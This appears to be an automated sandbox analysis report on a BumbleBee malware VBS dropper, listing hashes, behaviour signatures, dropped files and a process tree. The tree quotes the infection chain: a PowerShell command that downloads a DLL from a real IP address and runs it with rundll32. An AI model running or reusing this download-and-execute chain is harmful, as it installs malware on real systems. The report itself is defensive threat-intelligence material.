bumblebee | e7407a0fe469fda07809db9a264e4c423d9f740344abca7675e9e78a9ede9f3c

Analysis

max time kernel
128s
max time network
257s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
13-09-2023 19:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IN(11)-9-12-2023_218082.vbs
Size

1KB
MD5

1be17a0ac48cab72a10836953c8186b0
SHA1

d5bdf81792cc2434d49bae66b1cc60027220298c
SHA256

e7407a0fe469fda07809db9a264e4c423d9f740344abca7675e9e78a9ede9f3c
SHA512

38a7e2121975a5ef80db59d81f3bca3fe845f4072a7b068d09707690b851b5e41ccf899ca7ff732ccb770528b772cdc2efadecf9d5a7bd34678d1c00053038f5

Score

10^/10

bumblebee js1 trojan

Malware Config

Extracted

Family

bumblebee

Botnet

js1

rc4.plain

Signatures

BumbleBee
BumbleBee is a webshell malware written in C++.
trojan bumblebee

Blocklisted process makes network request 1 IoCs

flow	pid	Process
1	2560	powershell.exe

Downloads MZ/PE file

Loads dropped DLL 1 IoCs

pid	Process
1724	rundll32.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1724	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2036	1724	WerFault.exe	72

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2560	powershell.exe
2560	powershell.exe
2560	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2560	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3864 wrote to memory of 2560	3864	WScript.exe	70
PID 3864 wrote to memory of 2560	3864	WScript.exe	70
PID 3864 wrote to memory of 1724	3864	WScript.exe	72
PID 3864 wrote to memory of 1724	3864	WScript.exe	72

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IN(11)-9-12-2023_218082.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3864
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" invoke-webrequest -uri 'http://128.140.97.33/6fc0ob45c6.dll' -outfile 'c:\users\public\name.dll';
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2560
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" c:\users\public\name.dll,DllRegisterServer
  2⤵
  - Loads dropped DLL
  - Suspicious use of NtCreateThreadExHideFromDebugger
  PID:1724
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1724 -s 392
    3⤵
    - Program crash
    PID:2036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5i1rltjj.44m.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
\??\c:\users\public\name.dll

Filesize
1.1MB

MD5
ff519023357a9cc5bb731d798de2f6b6

SHA1
c14545a2d261647012a825e77af3a52fbc2cbc4d

SHA256
e714557aa665651045795c747d9b0faec60863c27edd579c7d6ed75bb33b94f1

SHA512
daddc936416b6ff42bdc47ea50b9b7e0acdaa202f46f75e8a14422c5254eb9a23918bd42ea6131503692045cbedf66373429c9c3cd07286c649f2a04801df1c0

Download Submit
\Users\Public\name.dll

Filesize
1.1MB

MD5
ff519023357a9cc5bb731d798de2f6b6

SHA1
c14545a2d261647012a825e77af3a52fbc2cbc4d

SHA256
e714557aa665651045795c747d9b0faec60863c27edd579c7d6ed75bb33b94f1

SHA512
daddc936416b6ff42bdc47ea50b9b7e0acdaa202f46f75e8a14422c5254eb9a23918bd42ea6131503692045cbedf66373429c9c3cd07286c649f2a04801df1c0

Download Submit
memory/1724-37-0x00007FFBDDD80000-0x00007FFBDDF5B000-memory.dmp

Filesize
1.9MB

Download
memory/1724-36-0x0000012AE0B90000-0x0000012AE0C09000-memory.dmp

Filesize
484KB

Download
memory/1724-38-0x0000012AE0D20000-0x0000012AE0E2A000-memory.dmp

Filesize
1.0MB

Download
memory/1724-39-0x00007FFBDDD80000-0x00007FFBDDF5B000-memory.dmp

Filesize
1.9MB

Download
memory/1724-40-0x00007FFBDDD80000-0x00007FFBDDF5B000-memory.dmp

Filesize
1.9MB

Download
memory/1724-41-0x0000012AE0B90000-0x0000012AE0C09000-memory.dmp

Filesize
484KB

Download
memory/2560-10-0x000001E2CA4F0000-0x000001E2CA566000-memory.dmp

Filesize
472KB

Download
memory/2560-9-0x000001E2B1E30000-0x000001E2B1E40000-memory.dmp

Filesize
64KB

Download
memory/2560-25-0x000001E2B1E30000-0x000001E2B1E40000-memory.dmp

Filesize
64KB

Download
memory/2560-33-0x00007FFBC0FD0000-0x00007FFBC19BC000-memory.dmp

Filesize
9.9MB

Download
memory/2560-7-0x000001E2B1E30000-0x000001E2B1E40000-memory.dmp

Filesize
64KB

Download
memory/2560-5-0x00007FFBC0FD0000-0x00007FFBC19BC000-memory.dmp

Filesize
9.9MB

Download
memory/2560-4-0x000001E2CA340000-0x000001E2CA362000-memory.dmp

Filesize
136KB

Download